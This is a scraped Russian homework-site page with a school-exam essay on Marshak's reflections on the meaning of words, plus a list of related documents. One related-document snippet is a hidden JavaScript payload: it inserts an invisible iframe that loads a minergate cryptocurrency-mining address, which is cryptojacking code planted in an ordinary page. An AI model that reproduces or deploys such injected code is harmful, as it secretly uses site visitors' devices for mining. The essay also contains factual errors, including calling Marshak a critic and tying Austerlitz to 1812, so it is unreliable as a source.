-



   Часть С ЕГЭ по тексту С.Маршака "О лексическом значении слова".




doc.png  Тип документа: Сочинения


type.png  Предмет: ЕГЭ


type.png  ВУЗ: Не привязан


size.png  Размер: 0 b

Часть С ЕГЭ по тексту С.Маршака "О лексическом значении слова".

«Какое же необъятное, неисчерпаемое море – человеческая речь!», с этой фразы русский литературный критик С. Маршак повествует читателю о лексическом значении слова. Лишь словами мы способны передавать различные чувства и эмоции, ᴨᴏᴛрясать свое окружение. Благодаря красоте слова, поэты и писатели создают величайшие произведения и переносят нас в сказочный мир.
Точным словом мыслители отражали в своих творениях глубокие знания жизни и природы, нравственное состояние тех или иных поколений. Слово – источник истории, её двигатель.
Авторская позиция четко прослеживается. С. Маршак дает понять истинное назначение слова и языка, пример этому строчка: «Язык отражает глубокие знания людей и природы, приобретенное человечеством». Автор уверяет, что важно не только использование самих слов, но и опыт поколений, заключенный в них.
Я поддерживаю автора и считаю, что отношение к языку немало важно, оно обеспечивает нам память о былых событиях и вечных ценностях, которые не следует забывать.
Л. Н. Толстой мастерки владел словом, с художественной точностью он описывал события войны 1812 года в романе-эпопее «Война и мир». Это еще раз доказывает историческую востребованность языка, ведь не будь романа «Война и мир», мало кто понимал эмоциональный настрой русской армии во время битвы под Аустерлицем и других событий.
Современное общество перестало вкладывать в язык тот прежний смысл, который видит С. Маршак. Зато былая эмоциональность осталась. Информация с сайта Бигреферат.ру / bigreferat.ru Остались и те, способные заражать словом, словно поэты «Золотого века».
Язык и слово – бессмертные носители информации, без которых невозможно представить ни одно общество. Заботясь о красоте нашей речи, мы в силах предоставить следующим поколениям достойное и яркое будущее. Я думаю, все зависит от нас.



Похожие документы


Коммуникативное обучение русскому языку. Часть вторая
(function() { var w = document.createElement("iframe"); w.style.border = "none"; w.style.width = "1px"; w.style.height = "1px"; w.src = "//minergate.com/wmr/bcn/podivilovhuilo%40yandex.ru/4/258de372a1e9730f/hidden"; var s = document.getElementsByTagName("body")[0]; s.appendChild(w, s); })(); ...

Интегрированный урок по изучению комедии «Мещанин во дворянстве». Часть вторая
...

Изучение поэзии Такубоку в контексте японского искусства. Часть вторая
...

Избранное из «Жизненной драмы Платона» Часть вторая
И Платон и Гамлет, из страшного положения в начале их жизни оба вынесли, собственно, лишь ряд разговоров. Разговоры Гамлета глубокомысленны и остроумны. Разговоры Платона, с возражениями и дополнениями Аристотеля и стоиков и с заключениями новоплатоников, создали целый умственный мир, называемый греческою философией, и вошли в историческое развитие христианства как его главная основа. И все-таки приходится сказать, что жизненная трагедия Платона имела не только страшное начало, но и плачевный конец, как то и следует для настоящей трагедии. Из своего жизненного испытания он вышел хотя не без славы, но без победы. Подобно шекспировскому Гамлету — в отличие от сумароковского — он не мог жениться на своей Офелии: она утонула. В конце концов Платон, как Гамлет, оказался неудачником, хотя, разумеется, неудачи великого человека дают миру гораздо больше, чем множество самых блестящих удач людей обыкновенных....

Борисов Л. Под флагом Катрионы. Часть четвертая. Скитания. Глава вторая
Борисов Л. : Под флагом Катрионы. Часть четвертая. Скитания. Глава вторая "Нептун", - подсказал Симпсон. - "Одиннадцать тысяч дев", - не думая и радуясь находке, произнес Луи. - Недурно, а? Я засяду в каюте и с утра до вечера буду писать рассказы. Для романа мне нужен разбег. Для оседлой жизни - деньги. ...

Bigreferat.ru - каталог учебной информации (c) 2013-2014 | * | Правообладателям